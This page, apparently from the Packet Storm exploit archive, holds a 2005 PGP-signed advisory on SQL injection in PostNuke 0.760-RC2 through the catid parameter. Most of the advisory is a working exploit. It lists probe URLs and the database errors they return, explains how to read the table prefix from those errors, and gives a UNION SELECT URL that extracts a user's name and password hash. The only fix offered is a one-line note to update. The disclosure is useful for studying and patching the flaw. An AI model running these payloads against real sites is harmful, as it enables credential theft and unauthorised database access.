exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

postnukeSQL0760.txt

postnukeSQL0760.txt
Posted Mar 1, 2005
Authored by Maksymilian Arciemowicz

PostNuke 0.760-RC2 is susceptible to SQL injection attacks. Full detailed exploitation provided.

tags | exploit, sql injection
SHA-256 | 68f8bf2f941aa161edee0839eaf2921c3589b5d71f4d9c4347148aed2986fff7

postnukeSQL0760.txt

Change Mirror Download


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1]

Author: cXIb8O3(Maksymilian Arciemowicz)
Date: 15.2.2005
from securityreason.com TEAM

- --- 0.Description ---

PostNuke: The Phoenix Release (0.760-RC2=>x)

PostNuke is an open source, open developement content management system
(CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and
provides many enhancements and improvements over the PHP-Nuke system. PostNuke
is still undergoing development but a large number of core functions are now
stabilising and a complete API for third-party developers is now in place.
If you would like to help develop this software, please visit our homepage
at http://noc.postnuke.com/
You can also visit us on our IRC Server irc.postnuke.com channel
#postnuke-support
#postnuke-chat
#postnuke
Or at the Community Forums located at:
http://forums.postnuke.com/


- --- 1. Critical SQL INJECTION ---
This SQL INJECTION is in modules/News/funcs.php in function getArticles(). When this function is active(Other Stories), we can add sql querty in varible catid.

For exemple:

http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

http://[HOST]/[DIR]/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

http://[HOST]/[DIR]/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

etc.

and varible $query is:

- ---------------
SELECT pn__stories.pn_aid AS "aid", pn__stories.pn_bodytext AS "bodytext", pn__stories_cat.pn_themeoverride AS "catthemeoverride", pn__stories.pn_catid AS "cid", pn__stories_cat.pn_title AS "cattitle", pn__stories.pn_comments AS "comments", pn__stories.pn_counter AS "counter", pn__stories.pn_hometext AS "hometext", pn__stories.pn_informant AS "informant", pn__stories.pn_notes AS "notes", pn__stories.pn_sid AS "sid", pn__stories.pn_themeoverride AS "themeoverride", pn__topics.pn_topicid AS "tid", pn__stories.pn_time AS "time", pn__stories.pn_title AS "title", pn__topics.pn_topicname AS "topicname", pn__topics.pn_topicimage AS "topicimage", pn__topics.pn_topictext AS "topictext", pn__topics.pn_counter AS "tcounter", pn__stories.pn_time AS "unixtime", pn__stories.pn_withcomm AS "withcomm" FROM pn__stories LEFT JOIN pn__stories_cat ON pn__stories.pn_catid = pn__stories_cat.pn_catid LEFT JOIN pn__topics ON pn__stories.pn_topic = pn__topics.pn_topicid WHERE (pn__stories.pn_language
='eng' OR pn__stories.pn_language='') AND pn__stories.pn_catid='cXIb8O3 ORDER BY pn__stories.pn_time DESC
- ---------------

Exploit:
This exploit get password from user with id=2. But frist check prefix.

Step 1.
http://[HOST]/[DIR]/index.php?catid='cXIb8O3

Error message :
- ---------------
DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23
- ---------------

and pn_ is that prefix.

Step 2.
http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread&order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE%20pn_uid=2/*

- --- 2. How to fix ---

Download the new version of the script or update.

- --- 3. Greets ---

Only for sp3x..

- --- 4.Contact ---
Author: Maksymilian Arciemowicz
Location: Poland(Jelenia Gora), Luxembourg(Bereldange)
Email: max [at] jestsuper [dot] pl
GPG-KEY: http://security.jestsuper.pl
SECURITYREASON.COM TEAM

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCI3q4znmvyJCR4zQRAgiQAJ4w/H6sa4jeEgQttYjERpWoIfbscQCglFe4
/6PJBa0Rgiz5/SnDGnGsjZY=
=tr+q
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close